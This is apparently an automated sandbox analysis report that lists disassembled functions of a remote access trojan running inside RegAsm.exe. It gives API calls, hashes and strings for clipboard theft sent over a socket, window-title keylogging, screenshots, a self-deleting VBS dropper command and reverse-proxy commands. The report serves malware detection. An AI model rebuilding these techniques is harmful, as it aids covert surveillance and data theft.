                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                          • _free.LIBCMT ref: 0045137F
                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                          • _free.LIBCMT ref: 004513A1
                          • _free.LIBCMT ref: 004513B6
                          • _free.LIBCMT ref: 004513C1
                          • _free.LIBCMT ref: 004513E3
                          • _free.LIBCMT ref: 004513F6
                          • _free.LIBCMT ref: 00451404
                          • _free.LIBCMT ref: 0045140F
                          • _free.LIBCMT ref: 00451447
                          • _free.LIBCMT ref: 0045144E
                          • _free.LIBCMT ref: 0045146B
                          • _free.LIBCMT ref: 00451483
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                          • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                          • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                          Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 0041A04A
                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                          • Sleep.KERNEL32(000003E8), ref: 0041A18E
                          • GetLocalTime.KERNEL32(?), ref: 0041A196
                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                          • API String ID: 489098229-1431523004
                          • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                          • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                          • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                          • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                          Function 0040A761 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32(00001388), ref: 0040A77B
                            • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                            • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                            • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                            • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                          • String ID: 8SG$8SG$;|$PG$PG
                          • API String ID: 3795512280-2657715368
                          • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                          • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                          • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                          • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                          Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                          • ExitProcess.KERNEL32 ref: 0040D9FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                          • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                          • API String ID: 1913171305-3159800282
                          • Opcode ID: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                          • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                          • Opcode Fuzzy Hash: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                          • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                          Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                          • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                          • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                          • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                          Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                          • GetLastError.KERNEL32 ref: 00455D6F
                          • __dosmaperr.LIBCMT ref: 00455D76
                          • GetFileType.KERNEL32 ref: 00455D82
                          • GetLastError.KERNEL32 ref: 00455D8C
                          • __dosmaperr.LIBCMT ref: 00455D95
                          • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                          • CloseHandle.KERNEL32(?), ref: 00455EFF
                          • GetLastError.KERNEL32 ref: 00455F31
                          • __dosmaperr.LIBCMT ref: 00455F38
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                          • String ID: H
                          • API String ID: 4237864984-2852464175
                          • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                          • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                          • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                          • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                          Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free
                          • String ID: \&G$\&G$`&G
                          • API String ID: 269201875-253610517
                          • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                          • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                          • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                          • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                          Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 65535$udp
                          • API String ID: 0-1267037602
                          • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                          • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                          • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                          • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                          Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                          Download Yara Rule
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 0040AD73
                          • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                          • GetForegroundWindow.USER32 ref: 0040AD84
                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                          • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                          • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                          • String ID: [${ User has been idle for $ minutes }$]
                          • API String ID: 911427763-3954389425
                          • Opcode ID: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                          • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                          • Opcode Fuzzy Hash: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                          • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                          Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                          • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                          • __dosmaperr.LIBCMT ref: 0043A926
                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                          • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                          • __dosmaperr.LIBCMT ref: 0043A963
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                          • __dosmaperr.LIBCMT ref: 0043A9B7
                          • _free.LIBCMT ref: 0043A9C3
                          • _free.LIBCMT ref: 0043A9CA
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                          • String ID:
                          • API String ID: 2441525078-0
                          • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                          • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                          • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                          • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                          Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                          • GetMessageA.USER32 ref: 0040556F
                          • TranslateMessage.USER32(?), ref: 0040557E
                          • DispatchMessageA.USER32(?), ref: 00405589
                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                          • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                          • String ID: CloseChat$DisplayMessage$GetMessage
                          • API String ID: 2956720200-749203953
                          • Opcode ID: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                          • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                          • Opcode Fuzzy Hash: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                          • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                          Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                          • CloseHandle.KERNEL32(00000000), ref: 00417E20
                          • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                          • String ID: 0VG$0VG$<$@$Temp
                          • API String ID: 1704390241-2575729100
                          • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                          • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                          • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                          • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                          Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                          Download Yara Rule
                          APIs
                          • OpenClipboard.USER32 ref: 0041697C
                          • EmptyClipboard.USER32 ref: 0041698A
                          • CloseClipboard.USER32 ref: 00416990
                          • OpenClipboard.USER32 ref: 00416997
                          • GetClipboardData.USER32 ref: 004169A7
                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                          • CloseClipboard.USER32 ref: 004169BF
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                          • String ID: !D@
                          • API String ID: 2172192267-604454484
                          • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                          • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                          • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                          • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                          Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                          Download Yara Rule
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ControlManager
                          • String ID:
                          • API String ID: 221034970-0
                          • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                          • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                          • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                          • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                          Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 100059EA
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 100059F6
                          • _free.LIBCMT ref: 10005A01
                          • _free.LIBCMT ref: 10005A0C
                          • _free.LIBCMT ref: 10005A17
                          • _free.LIBCMT ref: 10005A22
                          • _free.LIBCMT ref: 10005A2D
                          • _free.LIBCMT ref: 10005A38
                          • _free.LIBCMT ref: 10005A43
                          • _free.LIBCMT ref: 10005A51
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                          • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                          • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                          • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                          Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 004481B5
                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                          • _free.LIBCMT ref: 004481C1
                          • _free.LIBCMT ref: 004481CC
                          • _free.LIBCMT ref: 004481D7
                          • _free.LIBCMT ref: 004481E2
                          • _free.LIBCMT ref: 004481ED
                          • _free.LIBCMT ref: 004481F8
                          • _free.LIBCMT ref: 00448203
                          • _free.LIBCMT ref: 0044820E
                          • _free.LIBCMT ref: 0044821C
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                          • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                          • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                          • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                          Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Eventinet_ntoa
                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                          • API String ID: 3578746661-3604713145
                          • Opcode ID: a5e6e4f700d91bea08a307d1eb73f3d8dd4849c16ac7e93ec8f1d67ca6239f50
                          • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
